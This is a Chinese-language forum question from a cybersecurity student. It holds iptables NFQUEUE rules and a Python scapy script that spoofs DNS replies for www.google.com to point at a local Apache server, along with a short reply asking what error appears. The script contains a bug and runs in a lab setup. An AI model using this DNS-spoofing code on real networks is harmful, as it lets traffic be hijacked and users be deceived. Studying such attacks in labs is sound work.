我一直在学习有关网络安全的课程,目前正在尝试使DNS欺骗程序起作用。这个想法是,目标(同一台计算机)每次尝试访问www.google.com时,它都会访问apache服务器。但是,它唯一要做的就是不连接到Google。可以说,我经验很少。
我开始于:
iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0
然后在Python 3.7上>
import netfilterqueue import scapy.all as scapy def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname if b'www.google.com' in qname: answer = scapy.DNSRR(rrname=qname, rdata=b'10.0.2.5') scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[scapy.IP].len del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.UDP].len del scapy_packet[scapy.UDP].chksum packet.set_payload(b'scapy_packet') packet.accept() queue = netfilterqueue.NetfilterQueue() queue.bind(0, process_packet) queue.run()我正在使用NAT网络,而10.0.2.5是我的Apache服务器。
我一直在学习有关网络安全的课程,目前正在尝试使DNS欺骗程序起作用。这个想法是,目标(同一台计算机)每次尝试访问www.google.com时,它都会访问...
您遇到什么错误?也许您的浏览器防火墙阻止了连接?